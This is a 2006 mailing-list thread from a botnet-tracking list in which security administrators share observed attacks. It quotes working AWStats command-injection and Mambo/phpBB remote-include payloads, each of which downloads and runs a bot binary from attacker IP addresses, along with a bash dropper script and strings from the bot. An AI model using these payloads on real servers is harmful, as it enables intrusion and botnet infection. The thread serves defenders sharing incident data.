To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- Pink--
Identical script here over the last couple of days. ISS Proventia calls this HTTP_AWStats_ConfigDir_Exec (configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcac ti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo| ) This signature coincides with another with ISS nomenclature HTTP_Spyki_PhpInclude_Worm Script is: _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absol ute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/ca cti;chmod%20744%20cacti;./cacti;echo%20YYY;echo| Sources are: 211.99.203.228, 83.16.125.3, 83.14.3.45, 85.10.195.19, 83.64.188.67 80.50.64.94, 80.55.211.182, 212.78.135.49, 83.14.239.2, 24.167.98.232, 80.222.61.159 Larry Kettlewell Chief Information Security Officer Kansas State Government -----Original Message----- From: PinkFreud [mailto:[EMAIL PROTECTED] Sent: Thursday, March 16, 2006 9:59 PM To: Jamie Riden Cc: [email protected] Subject: Re: [botnets] web remote inclulde path To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- This looks like more of LordNikon's handiwork. On Fri, Mar 17, 2006 at 08:51:40AM +1300, Jamie Riden babbled thus: > This seems to be quite popular at the moment. > > Around Wed 8th March, I saw a drop using this method, described here - > http://members.lycos.co.uk/jamieriden/mambo-exploit-obfuscated.pdf > > Probably not news to most of you, but I was surprised at how many > different computers were involved - 216.63.z.z ? initiator, 66.98.a.a > ? server hosting the defacing tool, 216.99.b.b ? machine we get the > first stage payload from, 217.160.c.c ? machine that we connect back > to and 219.96.d.d ? machine we get the second stage payload from. > > Anyway, this morning we're back to the usual shell script - > > #!/bin/bash > wget 209.200.224.166/foc > chmod 744 foc > ./foc > wget 209.200.224.166/iron > chmod 744 iron > ./iron > > Where 'iron' has the following strings in the binary: > > GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e 16%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo %%20YYY;ec > ho| HTTP/1.1 > Host: %s > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) > /index.php?option=com_content&do_pdf=1&id=1 > GET %sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos Config_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;wget%%20 83.16.187. > 6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1 > Host: %s > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) > GET %sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%2 0/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YY Y;echo| > HTTP/1.1 > > and 'foc' looks like the IRC bot. > > Note cmd.gif is the same or similar to a tool the Philippine Honeynet > project describe as > "" 'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts > that allows the attacker to send commands to the server primarily with > the intent to deface websites. " > > cheers, > Jamie -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
